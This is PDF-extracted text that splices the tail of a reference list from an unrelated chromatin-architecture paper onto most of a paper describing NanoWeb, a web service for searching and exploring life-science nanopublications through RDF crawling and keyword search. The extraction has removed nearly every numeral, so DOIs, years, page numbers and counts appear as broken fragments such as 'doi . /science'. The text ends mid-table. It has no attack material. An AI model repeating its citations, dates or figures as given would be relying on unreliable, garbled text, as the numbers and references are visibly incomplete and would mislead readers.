http://dx.doi.org/ . /nrm. . http://dx.doi.org/ . /fgene. . http://dx.doi.org/ . /nar/gkz http://dx.doi.org/ . /peerj-cs. lieberman-aiden e, van berkum nl, williams l, imakaev m, ragoczy t, telling a, amit i, lajoie br, sabo pj, dorschner mo, sandstrom r, bernstein b, bender ma, groudine m, gnirke a, stamatoyannopoulos j, mirny la, lander es, dekker j. . comprehensive mapping of long-range interactions reveals folding principles of the human genome. science ( ): – doi . /science. . liu q, lv h, jiang r. . hicgan infers super resolution hi-c data with generative adversarial networks. bioinformatics ( ):i –i doi . /bioinformatics/btz . lupiáñez dg, spielmann m, mundlos s. . breaking tads: how alterations of chromatin domains result in disease. trends in genetics ( ): – doi . /j.tig. . . . martens ld, faust o, pirvan l, bihary d, samarajiwa sa. . identifying regulatory and spatial genomic architectural elements using cell type independent machine and deep learning models. biorxiv. doi . / . . . . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . rada-iglesias a, bajpai r, swigut t, brugmann sa, flynn ra, wysocka j. . a unique chromatin signature uncovers early developmental enhancers in humans. nature ( ): – doi . /nature . ramírez f, bhardwaj v, arrigoni l, lam kc, grüning ba, villaveces j, habermann b, akhtar a, manke t. . high-resolution tads reveal dna sequences underlying genome organization in flies. nature communications ( ): – doi . /s - - -w. rao ssp, huntley mh, durand nc, stamenova ek, bochkov id, robinson jt, sanborn al, machol i, omer ad, lander es, aiden el. . a d map of the human genome at kilobase resolution reveals principles of chromatin looping. cell ( ): – doi . /j.cell. . . . ren b, robert f, wyrick jj, aparicio o, jennings eg, simon i, zeitlinger j, schreiber j, hannett n, kanin e, volkert tl, wilson cj, bell sp, young ra. . genome- wide location and function of dna binding proteins. science ( ): – doi . /science. . . . rowley mj, lyu x, rana v, ando-kuri m, karns r, bosco g, corces vg. . condensin ii counteracts cohesin and rna polymerase ii in the establishment of d chromatin organization. cell reports ( ): – doi . /j.celrep. . . . rowley mj, nichols mh, lyu x, ando-kuri m, rivera ism, hermetz k, wang p, ruan y, corces vg. . evolutionarily conserved principles predict d chromatin organization. molecular cell ( ): – doi . /j.molcel. . . . schreiber j, libbrecht m, bilmes j, noble ws. . nucleotide sequence and dnasei sensitivity are predictive of d chromatin architecture. biorxiv. doi . / . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /science. http://dx.doi.org/ . /bioinformatics/btz http://dx.doi.org/ . /j.tig. . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /j.celrep. . . http://dx.doi.org/ . /j.molcel. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. schuster m, paliwal k. . bidirectional recurrent neural networks. ieee transactions on signal processing ( ): – doi . / . . schwessinger r, gosden m, downes d, brown r, telenius j, teh yw, lunter g, hughes jr. . deepc: predicting chromatin interactions using megabase scaled deep neural networks and transfer learning. biorxiv. doi . / . sexton t, yaffe e, kenigsberg e, bantignies f, leblanc b, hoichman m, par- rinello h, tanay a, cavalli g. . three-dimensional folding and func- tional organization principles of the drosophila genome. cell ( ): – doi . /j.cell. . . . singh s, yang y, poczos b, ma j. . predicting enhancer-promoter interaction from genomic sequence with deep neural networks. quantitative biology ( ): – doi . /s - - - . stadhouders r, vidal e, serra f, di stefano b, le dily f, quilez j, gomez a, collombet s, berenguer c, cuartero y, hecht j, filion gj, beato m, marti-renom ma, graf t. . transcription factors orchestrate dynamic interplay between genome topology and gene regulation during cell reprogramming. nature genetics ( ): – doi . /s - - - . trieu t, martinez-fundichely a, khurana e. . deepmilo: a deep learning approach to predict the impact of non-coding sequence variants on d chromatin structure. genome biology ( ): – doi . /s - - -x. ulianov sv, khrameeva ee, gavrilov aa, flyamer im, kos p, mikhaleva ea, penin aa, logacheva md, imakaev mv, chertovich a, gelfand ms, shevelyov yy, razin sv. . active chromatin and transcription play a key role in chromosome partitioning into topologically associating domains. genome research ( ): – doi . /gr. . . wang y, li x, hu h. . h k me reliably defines transcription factor binding regions in different cells. genomics ( ): – doi . /j.ygeno. . . . wang q, sun q, czajkowsky dm, shao z. . sub-kb hi-c in d. melanogaster reveals conserved characteristics of tads between insect and mammalian cells. nature communications ( ): – doi . /s - - -w. waterston r, celniker s, snyder m, white k, henikoff s, karpen g. . unlocking the secrets of the genome. nature ( ): – doi . / a. whalen s, truty rm, pollard ks. . enhancer–promoter interactions are encoded by complex genomic signatures on looping chromatin. nature genetics ( ): – doi . /ng. . yan x, su x. . linear regression analysis: theory and computing. singapore: world scientific. yuan y, shi y, su x, zou x, luo q, feng dd, cai w, han z-g. . cancer type pre- diction based on copy number aberration and chromatin d structure with convolu- tional neural networks. bmc genomics ( ): doi . /s - - -z. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . / a http://dx.doi.org/ . /ng. http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /peerj-cs. zeng w, wang y, jiang r. . integrating distal and proximal information to predict gene expression via a densely connected convolutional neural network. bioinformat- ics ( ): – . zeng w, wu m, jiang r. . prediction of enhancer-promoter interactions via natural language processing. bmc genomics (suppl ): doi . /s - - - . zhimulev if, zykova ty, goncharov fp, khoroshko va, demakova ov, semeshin vf, pokholkova gv, boldyreva lv, demidova ds, babenko vn, demakov sa, belyaeva es. . genetic organization of interphase chromosome bands and interbands in drosophila melanogaster. plos one ( ): – doi . /journal.pone. . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. search, access, and explore life science nanopublications on the web search, access, and explore life science nanopublications on the web fabio giachelle, dennis dosso and gianmaria silvello department of information engineering, university of padua, padova, italy abstract nanopublications are resource description framework (rdf) graphs encoding scientific facts extracted from the literature and enriched with provenance and attribution information. there are millions of nanopublications currently available on the web, especially in the life science domain. nanopublications are thought to facilitate the discovery, exploration, and re-use of scientific facts. nevertheless, they are still not widely used by scientists outside specific circles; they are hard to find and rarely cited. we believe this is due to the lack of services to seek, find and understand nanopublications’ content. to this end, we present the nanoweb application to seamlessly search, access, explore, and re-use the nanopublications publicly available on the web. for the time being, nanoweb focuses on the life science domain where the vastest amount of nanopublications are available. it is a unified access point to the world of nanopublications enabling search over graph data, direct connections to evidence papers, and scientific curated databases, and visual and intuitive exploration of the relation network created by the encoded scientific facts. subjects data science, databases, digital libraries keywords nanopublication, scientific data, graph exploration, data search, data citation, data exploration, data access introduction the scientific world is swiftly becoming data-centric, embracing the principles of the so-called fourth paradigm of science (hey, tansley & tolle, ). data are at the center of scientific discovery as well as of scholarship and scholarly communication (borgman, ). the growing role of data is also witnessed by the ever-increasing importance of data science and related research fields concerning the search (chapman et al., ), provenance (cheney, chiticariu & tan, ), citation (silvello, ), re-use (wynholds et al., ), and exploration (rahman, jiang & nandi, ) of data. there is no “one size fits all” solution when it comes to data search, access, and re-use given the heterogeneity of data representations and models, interoperability issues, and domain-dependent requirements. in the context of scientific data, the nanopublication model has been proposed to target some of these issues (groth, gibson & velterop, ). nanopublications exploit the linked open data (lod) principles (bizer, heath & berners-lee, ) to represent scientific facts (assertions hereafter) as self-consistent, independent and machine-readable information tokens. a repository of nanopublications is to be thought of as an open and interconnected knowledge graph seamlessly integrated with the supporting scientific literature. nanopublications can be used to support how to cite this article giachelle f, dosso d, silvello g. . search, access, and explore life science nanopublications on the web. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published february corresponding author gianmaria silvello, gianmaria.silvello@unipd.it academic editor arkaitz zubiaga additional information and declarations can be found on page doi . /peerj-cs. copyright giachelle et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:gianmaria.�silvello@�unipd.�it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ scientific claims, to explore scientific knowledge by exploiting machine intelligence and as entry points to scientific databases. hence, this model has been embraced by several scientific fields, especially in the life science domain, leading to the creation of more than ten million openly available nanopublications (kuhn et al., ). from the technical viewpoint, a nanopublication is a resource description framework (rdf) graph built around an assertion represented as a triple (subject-predicate-object) and usually extracted, manually or automatically, from a scientific publication. the nanopublication enriches the assertion with provenance and publication information. the rdf representation format enables interoperability and thus the re-use of data, whereas provenance and publication information eases authorship recognition, credit distribution, and citation. as an example taken from the biomedical domain, a nanopublication assertion about a gene-disease association is〈activin a receptor type a—gene-disease biomarker association—colorectal cancer〉, where activin a receptor type a is the subject, gene-disease biomarker association is the predicate and colorectal cancer is the object of the triple. this assertion is extracted from an article (campregher et al., ), which puts in relation the activin a receptor type a gene to the colorectal cancer and describes a drug—that is, mesalazine—that reduces mutations in transforming growth factor of the gene. in fig. a, we can see a snippet of the rdf nanopublication serialization described above. nanopublications are defined using the compact trig (https://www.w .org/tr/ trig/) syntax, that enables to define prefixes to avoid to re-write the same iris multiple times. in fig. a we used some prefixes within the nanopublication assertion, namely: dgn- gda, sio, miriam-gene and lld, that are specific of the life science domain. dgn-gda identifies a disgenet (http://rdf.disgenet.org/) gene-disease association; sio identifies a resource from semanticscience integrated ontology (sio) (https://github.com/maastrichtu-ids/ semanticscience), such as the type of a gene-disease association; miriam-gene identifies a gene in the national center for biotechnology information (ncbi) (https://www.ncbi. nlm.nih.gov/) database; lld identifies a resource from the linked life data (http://linkedlifedata.com/) platform for the biomedical domain. the nanopublication is composed of four parts: (i) the head that acts as a connector between the other three sub-graphs; (ii) the assertion graph (blue) expressing the relationship between the two concepts of the assertion (the gene-disease association), the relationship of the concepts with external ontologies (the fact that activin a receptor type a is a gene and colorectal cancer is a disease), and possibly a link towards the scientific database storing related data; (iii) the provenance graph (orange) containing metadata about the assertion such as the methods used to generate the assertion and its creators; and (iv) the publication info graph (yellow) containing the metadata about the evidence paper from which the assertion was extracted and about the nanopublication itself. in fig. b, we can see a graphical representation of the four parts of the nanopublications with a human-readable representation of the gene-disease association encoded by the assertion graph. a key aspect motivating the use of nanopublications is the possibility to exploit lod features, allowing for exploring relation networks created by connecting related facts giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.w .org/tr/trig/ https://www.w .org/tr/trig/ http://rdf.disgenet.org/ https://github.com/maastrichtu-ids/semanticscience https://github.com/maastrichtu-ids/semanticscience https://www.ncbi.nlm.nih.gov/ https://www.ncbi.nlm.nih.gov/ http://linkedlifedata.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ encoded in rdf. indeed, nanopublications create a network of scientific assertions that can be explored to discover connections between facts. in the literature, there is important evidence of using nanopublications as a credible approach for expanding scientific insight, especially in the biomedical domain (chichester et al., ). as a motivating example, fig. c shows a small network of gene-disease associations. we can see that the genes activin a receptor type a and xrcc p are both related to colorectal cancer. if we search for other connections, we find another nanopublication relating the xrcc p gene to the malignant neoplasm of breast disease. further expanding the relation network, we see that there exist two other nanopublications connecting the abca gene with both colorectal cancer and malignant neoplasm of breast. fig. c presents a small network that shows the relationships between facts extracted from five different papers published in different venues at different times that do not cite each other. this is just a hint about how exploring figure (a) rdf (trig) representation of the nanopublication encoding the assertion: (activin a receptor type a—gene—disease association—colorectal cancer); (b) graphical representation of the four parts of the nanopublications with a human-readable representation of the assertion graph; (c) network of gene-disease associations created by five nanopublications. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the nanopublication relation network could lead to finding related concepts and assertions that might not be explicitly connected in the scientific literature and databases. nonetheless, despite these premises, nanopublications are not widely used by scientists outside specific circles (page, ); they are hard to find and rarely cited. nanopublications rarely have a human-readable accessible version and cannot be searched via keywords or natural language queries. although nanopublications are based on lod principles, there are still no tools that allow the user to explore their connections intuitively and discover if and how one assertion is related to others, as we have done in the example above. leveraging on the famous data is the new oil metaphor (the economist, ), we can say that with nanopublications we have a vast oil reservoir but no active refinery, distribution net and machines to put it into use. in this work, we target these issues and present the nanoweb application (https://w id. org/nanoweb/), an open-source and publicly available web service enabling intuitive search, exploration, and re-use of nanopublications. the current version of nanoweb is tailored for the life science domain, and it is designed to help experts of this domain in their research work. nanoweb is an extensible tool to be applied to other scientific domains, even though certain customization to do so will be required. nanoweb is a single entry point to the world of nanopublications enabling the seamless integration of data search, exploration, and re-use services; its central features are: . a crawler gathering publicly available nanopublications from the web; . two intuitive search functionalities, based respectively on the keyword search and boolean search paradigms; . a user-oriented visual interface to consult the nanopublications enriched with information gathered from external authoritative ontologies; . a service enabling the graph-based visualization of assertions and the exploration of their relation network; . data search functionalities providing entry points to external curated databases storing the scientific facts encoded by the nanopublications as well as to the scientific papers where the assertions were extracted. the rest of the article is organized as follows: “background” presents the background of the nanopublication model and the state of the art of systems based on it. “the nanoweb architecture” describes the overall architecture of the nanoweb application. “nanopublication collection statistics” reports the statistics about the nanopublications available in nanoweb. “nanoweb graphical user interface” shows how nanoweb works and details the functioning of the user interface. “expert users survey” reports the results of the expert users survey conducted on nanoweb. “discussion on maintaining aspects” discusses the challenges to be faced with maintaining nanoweb in the medium-long period and how it can scale up to be used in domain others than life science. finally, “conclusions” draws some final remarks and outlines future work. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://w id.org/nanoweb/ https://w id.org/nanoweb/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ background basics of nanopublications nanopublications rely on semantic web technology. in particular, they are modeled via rdf (groth, gibson & velterop, ), a widely used standard endorsed by the w c consortium (https://www.w .org/tr/rdf -primer), adopted for data publishing, accessing and sharing. rdf allows for the manipulation, enrichment, discovery and interoperability of data and it is at the core of the implementation of the lod paradigm (pound, mika & zaragoza, ). rdf is based on the concept of statement, that presents a <subject, predicate, object> triple-based structure. within a triple, subject, predicate and object are resources. in particular, an rdf dataset can be represented as a graph where, given a triple, the subject and the object are the nodes representing resources, while the predicate, the direct edge connecting the two, expresses their relationship. rdf resources can either be internationalized resource identifiers (iris), literals or blank nodes. an iri (https://tools.ietf.org/html/rfc ) is a more general form of uri which can also contain unicode characters. a literal is a value which can be associated to a specific type of value, such as string, integer, date, time etc. the default value is string. blank nodes are resources which are labeled with a uri-like string which has validity only inside the database. in rdf every resource and relationship is labeled. subject and object nodes can be labeled with iris, object nodes can also be labeled with literals. relationships can only be labeled with iris. blank nodes can be subject or object of a triple. a set of rdf triples can also be thought as a directed graph, where subjects and objects are nodes and predicates are the directed edges. hence, it is also called rdf graph. in recent years it has been proposed the idea to extend the basic semantic of rdf by using quads instead of triples, where an identifier (an iri) is added. in this way, groups of triples may be characterized as belonging to the same subgraph, that is, to the same named graph (carroll & stickler, ; carroll et al., ), if they share the same extra uri. every nanopublication is made of four basic named graphs as shown in figure .a: . head: the graph composed of four triples connecting assertion, provenance and publication info graphs together and specifying that the graph at hand is a nanopublication. . assertion: the assertion is to be thought of as the minimal unit of thought, a fact or a statement. it can be composed of one or more rdf triples and for this reason, we often call it assertion graph. . provenance: the named graph made of metadata providing context about the assertion. the information contained in the provenance describes how the information expressed in the assertion was created (from some experiment, extrapolate from a paper or article, etc.) and the methods that were used to generate the assertion. it includes information such as authors, institutions, time-stamps, grants, links to evidence papers and other resources. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.w .org/tr/rdf -primer https://tools.ietf.org/html/rfc http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . publication information: the graph containing the information about the nanopublication itself, such as its authors, the topic of the assertion, and rights information. nanopublication resources and datasets the website http://nanopub.org/ is the most comprehensive access point to the world of nanopublications. it collects papers and tools about nanopublications. the central resource to access millions of publicly available nanopublications is the “nanomonitor” (http://app. tkuhn.eculture.labs.vu.nl/nanopub-monitor/). it provides a list of sixteen worldwide distributed servers where nanopublications can be openly accessed and downloaded in several formats. the nanopublications are ordered by identifier, but no full-text or structured search service is available. the nanopublications are accessible in an rdf serialization format. thus they are machine-readable but not human-readable (see fig. a). kuhn et al. ( ) describes a web-based service (i.e., nanobrowser) enabling access to human-readable enriched scientific statements extracted from nanopublications. the aim of nanobrowser is to enable easy publishing and curation of nanopublications, but unfortunately, at the time of writing, it does not work, even though the source code is publicly available (https://github.com/tkuhn/nanobrowser). the nanobrowser had the goal to ease the extraction of facts from scientific papers and to enable the community to curate and revise the statements; its overall objective is different from those of nanoweb even though they share the requirement of making nanopublications human-readable and facilitate access to them. in the same direction, the whyis project (http://tetherless-world. github.io/whyis/) proposes a knowledge graph infrastructure to support domain-aware management and curation of knowledge from different sources; it leverages on the nanopublication model to represent the facts and handle their provenance in the knowledge base. whyis also offers some facilities to allow the users to visually explore the knowledge graph beyond a given entity by using the so-called knowledge explorer (mccusker et al., ; mccusker et al., ); the knowledge explorer shares some similarities with the nanoweb exploration tool. in particular, they both allow the exploration of the connections between entities in the knowledge graph. nevertheless, whyis does not visualize the scientific assertions encoded by nanopublications. more specifically, the whyis project is oriented to the creation and user-based curation of the nanopublications rather than to the search and exploration possibilities connected to them. hence, nanoweb is a complementary service rather than a competitor to whyis. mons et al. ( ) advocated for the systematic use of nanopublications to encode scientific facts reported in published papers. they see nanopublications as the key tool to enable reasoning and fact discovery exploiting machine intelligence. furthermore, they extracted thousands of nanopublications about valuable and hard to discover gene variations and made them publicly available. we enable the search and access to these nanopublications in nanoweb. chichester et al. ( ) described how they created nanopublications encoding scientific facts associated with more than k proteins stored in the nextprot giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://nanopub.org/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ https://github.com/tkuhn/nanobrowser http://tetherless-world.github.io/whyis/ http://tetherless-world.github.io/whyis/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ database (https://www.nextprot.org/). the main motivation for this work is to exploit nanopublications potential to support end-user research on human proteins enabling machine-reasoning, easy search and access to the protein-related facts. chichester et al. ( ) showed how nanopublications as fine-grained annotations answer to complex knowledge discovery queries otherwise challenging to deal with. also, in this case, queries are performed using the sparql structured language confining the use of nanopublications to technical database experts. we crawled and enable keyword-based search over all the publicly available nextprot nanopublications. queralt-rosinach et al. ( ) described the process that led to the publication of millions of nanopublications about the pathophysiology of diseases extracted from the scientific literature and backed by curated records in the disgenet database (http://rdf. disgenet.org/). the disgenet nanopublications are publicly available and accessible via a sparql endpoint. nanoweb collected, indexed all the available disgenet nanopublications and made them searchable and human-readable. each nanopublication is enriched with a url linking to the related curated record in disgenet. wikipathways is an online collaborative pathway resource that is made available as rdf and nanopublications (waagmeester et al., ). the nanopublications are backed by the wikipathways curated database and are accessible via a sparql endpoint (not available at the time of writing). the resource to convert the rdf triples of wikipathways to nanopublication is publicly available (https://github.com/wikipathways/ nanopublications). we crawled all the wikipathways nanopublications, that are now searchable and accessible via nanoweb. hettne et al. ( ) extracted more than m assertions about gene-disease associations from the biomedical literature. m assertions are explicitly stated in the scientific papers and the rest is implicitly inferred. there is a publicly available dump (https://datadryad.org/stash/dataset/doi: . /dryad.gn ) of the nanopublications shared as additional data for the article. the research group (https://biosemantics. erasmusmc.nl/) was responsible for the website “https://rdf.biosemantics.org/” (now inactive) sharing all the nanopublications and the ontology required to dereference the concepts encoding the assertions. unfortunately, at the time of writing, the nanopublications as well as the sparql endpoints to access them are unavailable. amith & tao ( ) defined an ontology—vaxmo—for encoding vaccines-related information extracted from scientific literature and used nanopublications to propose a method to store misconceptions about vaccines. unfortunately, the vaxmo ontology is not accessible as well as the associated nanopublications. also, zhang et al. ( ) recently used the nanopublication model to represent scientific facts manually extracted from the literature about cancer behavioral risk factors. they presented a prototype— aero—to search and visualize the nanopublications; search is based on sparql queries and the visualization is allowed only for the results returned by the sparql endpoint. at the time of writing, aero is not publicly available. to the best of our knowledge, there is no available tool to visualize nanopublications and explore their connections. the tool which is closer to nanoweb in terms of semantic search and graph visualization is biokb (biryukov et al., ). biokb provides access giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.nextprot.org/ http://rdf.disgenet.org/ http://rdf.disgenet.org/ https://github.com/wikipathways/nanopublications https://github.com/wikipathways/nanopublications https://datadryad.org/stash/dataset/doi: . /dryad.gn https://biosemantics.erasmusmc.nl/ https://biosemantics.erasmusmc.nl/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to the semantic content of biomedical articles through a sparql endpoint and a web interface; its goal is to allow the users to search for biomedical entities and visualize their graph of relations. however, biokb does not account for nanopublications and does not support a multi-level exploration of the graph, enabling an in-depth exploration of the entities relation network. overall, the current services for searching nanopublications are all based on sparse sparql endpoints. to this end, nanoweb contributes on two levels. first, it provides a unique online access point to all the publicly available nanopublications from the life science domain; and, second, nanoweb provides advanced services such as keyword search, visualization and human-readable access to millions of nanopublications, making them accessible to users without technical expertise in sparql and related technologies. search over rdf rdf graphs can be interrogated through the powerful but complex sparql query language (pérez, arenas & gutierrez, ). sparql is not intuitive for end-users since it presents a complex syntax, far from a natural expression of their information need (wu, ). it also requires knowledge of the underlying schema of the database, and of the iris used in it. this knowledge is often not possessed by the average end-user. a search paradigm adopted to address the issues related to the use of sparql is keyword search. keyword-based methods have gained importance over time both in research and in industry as a paradigm to facilitate the access to structured data (bast, buchhold & haussmann, ; kopliku, pinel-sauvagnat & boughanem, ; yu, qin & chang, ). the main difference between sparql and keyword search is that, while sparql returns the one and only correct answer (or an empty set if there was no answer), keyword search returns a ranking of answers, ordered based on their relevance to the information need expressed by the user via the keyword query. in the literature, keyword query search systems over structured data are mainly focused on relational databases (rdb) (yu, qin & chang, ) but many are also emerging for graph-like databases such as rdf datasets (wang & aggarwal, ; bast, buchhold & haussmann, ). these systems may be divided into three categories. the first kind of systems is schema-based. examples are (balmin et al., ; agrawal, chaudhuri & das, ; luo et al., ). these systems exploit the schema information of the database, be it relational or rdf, to formulate queries in a structured language (sql or sparql depending on the type of the database) designed from the keyword query of the user. the second category is graph-based. originally born with relational databases (bhalotia et al., ; simitsis, koutrika & ioannidis, ), the technique at the base of these systems was based on the transformation of the relational database in a graph. these systems are relatively easily translated in the rdf scenario since these databases are already in a graph form. a core challenge of these systems is to deal with the size of big graphs, which can contain tens of millions of nodes, if not more. in several cases, it has been shown that the size makes the task unsolvable by these systems (coffman & weaver, ). giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ stemming from this last class of systems, the last category is the one of the virtual- document based systems kadilierakis et al. ( ). first described in lopez-veyna, sosa & lópez-arévalo ( ), this approach relies on the concept of virtual document of a graph. given one graph, rdf or obtained by relational tuples, its corresponding virtual document is obtained by extracting words from it in an automatic way. this produces a “flat” representation of the graph, where its syntax and topology are lost but its semantic and lexical content is somewhat maintained. the virtual document representation is convenient since systems can leverage on efficient state-of-the-art ir methods for indexing and ranking. these methods operate by first extracting subgraphs from the whole database, then converting them in their virtual document representation and ranking these documents with respect to the keyword query. the user receives at the end the ranking of graphs in the order dictated by the ranking on the corresponding documents. there is no keyword search system for nanopublications, which are always searched via sparql endpoints. the complexity of search systems for rdf and their scalability issues have prevented the use of keyword search for rdf data in general and nanopublications in particular. nanoweb, exploits a very recent advancement in virtual-document based systems (dosso & silvello, ), which enable fast and effective keyword search over rdf and nanopublications. the nanoweb architecture the nanoweb architecture is composed of four main components: (i) a crawler that gathers nanopublications from the web; (ii) a search system that indexes and enables full- text search over the nanopublications; (iii) a nanopublication citation system; (iv) a web user interface to search, access and explore the nanopublications and their relation network. figure shows the architecture of the nanoweb system, which consists of the following areas: � data creation and update (fig. a): —crawler ( ): it collects nanopublications from different web sources. it considers different types of resources: authoritative ones, such as academic or institutional platforms; and public ones, such as git repositories. nanopublications are downloaded and stored in an rdf database ( ). the crawler also downloads new nanopublications obtained from urls that can be provided by the users; this process is handled by the business logic unit ( ). the crawler sends a new request for each web source in the list of initial seeds. it parses and scrapes the web pages and produces a list of extracted urls. each url in the list is processed so that direct links to nanopublications are resolved and added to the download queue. each nanopublication file is downloaded using an independent thread so that requests are handled asynchronously. these files are saved into the rdf database. the links in the url list that point to other web pages are followed so that these new web pages are also parsed and scraped in a recursive scraping loop to discover new nanopublications. the crawler is written in java and it comes with a graphical and a batch mode. the graphical mode allows the user to interact and control crawler giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ activities using a graphic user interface (gui). the batch mode enables a fast and batch-based download using operating systems lacking a gui. —metadata builder ( ): the nanopublications are processed to dereference the urls and to get additional metadata; for instance, the nanopublications are enriched with the label of the concepts referring to external ontologies, the names of creators and curators and the title of the evidence papers. these data are saved in a relational database ( ). —document builder ( ): the document creation phase occurs after the dereferencing and enrichment phase. the document builder creates “virtual” nanopublication documents, which are saved into a database ( ), on which the keyword search system is based. � search system (fig. b): this system performs keyword search on the nanopublications and it has three components: —business logic ( ): it is the controller unit of the search system. it performs the orchestration activities such as the coordination of the crawler by feeding it with new nanopublication urls. it takes the user keyword query as input and returns the relevant nanopublications through the web interface as output. to perform this task, the business logic unit relies on three databases: the nanopublication documents database ( ), the fields ( ) and the indexes ( ). the indexes database contains the inverted index extracted from the nanopublication documents required to match the query terms with the document terms. the fields database is required to provide fast access to specific nanopublication data such as the authors, curators, and evidence paper metadata. —web interface ( ): it is the front-end allowing the user to search, access, explore and cite nanopublications through an interactive interface. it communicates with the business logic unit using a rest layer that provides public api for accessing nanopublications data in json format. —log system ( ): it deals with the logging tasks of the search system and it relies on a specific relational database ( ). it communicates with the web interface to collect relevant user activity information and possible problems. � citation system ( ): it generates the citations text snippet for the nanopublications of interest to the user by relying on the system presented by fabris, kuhn & silvello ( ). citations are a fundamental tool to give credit to authors and curators of data and publications and help other users to recognize the value of nanopublications. when the business logic unit ( ) receives the request to produce a citation for a nanopublication, it sends this request to the citation system, that in turn collects the necessary metadata from the corresponding database ( ). once produced, the citation snippet is returned to the business logic unit and then visualized in the web interface. search system let us assume that a user has an information need, and wants to retrieve the nanopublications that satisfy it. since nanopublications are encoded in rdf, one a demonstration video of the crawler in action, using the graphic mode, is avail- able at https://bit.ly/ rvlgzl. all the relational databases are based on postgresql version . allowing for the table partitioning function; this function enables efficient storage and access to the data. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://bit.ly/ rvlgzl http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ possibility is to query the graph composed by all the nanopublications via the sparql query language, that, as already discusses, presents drawbacks for non-expert users. we adopt two alternatives to sparql, that is, keyword search and boolean search, both oriented to ease the search process for the users. boolean search (i.e., advanced search) is adopted for domain-specific searches and it is useful to guide users in query formulation, since they often do not know in advance what they can search. we realized advanced search over the nanopublication metadata database, that allows for searching on specific fields of the indexed data (e.g., genes, diseases, proteins or authors). boolean search enables targeted search functionalities, but it does not allow for general and open full-text search over the nanopublications. to allow users to exploit natural language to search for nanopublications, we realized a keyword search system over rdf data. the system we adopt is based on the virtual document strategy, first presented in lopez- veyna, sosa & lópez-arévalo ( ) and used in many other papers about keyword search on rdf graphs (dosso & silvello, ; elbassuoni & blanco, ; mass & sagiv, ). the underlying task of these papers is that, given an rdf graph, the user wants to query it, but for some reason, she is unable to use a sparql query. keyword search is an alternative paradigm to using a structured query based on a query made of keywords. figure nanoweb system architecture. (a) data creation and update area; (b) search system; (c) supporting databases. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the virtual document strategy is one of the many strategies deployed to face keyword search on rdf graphs. given an rdf graph, we call its corresponding virtual document the textual document obtained from the concatenation of words obtained from the iris and literals contained in the nodes and edges of the graph. given a collection of graphs it is therefore possible to create a corresponding collection of virtual documents. every document is uniquely linked to the graph that generated it since they share the same identifier. then, the collection of documents is indexed and, from that moment on, this index can be used to answer keyword queries in the same way in which it is done in more classic ir scenarios, where the collections are made by “real” documents. in this paper we used a probabilistic model (i.e., bm (robertson et al., )) as ranking function. every time a new query is issued, bm uses the virtual document index to create a ranking of documents. the document identifiers are used to retrieve the corresponding graphs, that is, the corresponding nanopublications, from the collection. this list of nanopublications is then returned to the final user in the same order dictated by the ranking. one may argue that this strategy discards information from the graphs. since each graph is flattened to a document version of itself, information such as its topology and the disposition of words among nodes and edges is lost. this is certainly true, and in fact works such as (dosso & silvello, ; elbassuoni & blanco, ; mass & sagiv, ) do not limit themselves to virtual documents, but employ different kinds of heuristics to better leverage on the topology of the graphs. moreover, topology oriented heuristics often rely on the exploration of the graphs, which adds overhead to the whole computation. the more the answers returned by bm , the bigger this overhead. therefore, we argue that the use of topology-oriented heuristics do not guarantee a significant improvement on the effectiveness of the rankings obtained by the graphs with respect to the added overhead to the computation. nanopublication collection statistics in table we report the number of nanopublications per scientific platform currently available in nanoweb. currently, we have crawled and indexed nanopublications from the following platforms: � disgenet: (https://www.disgenet.org/) “a discovery platform containing one of the largest publicly available collections of genes and variants associated to human diseases” table number of 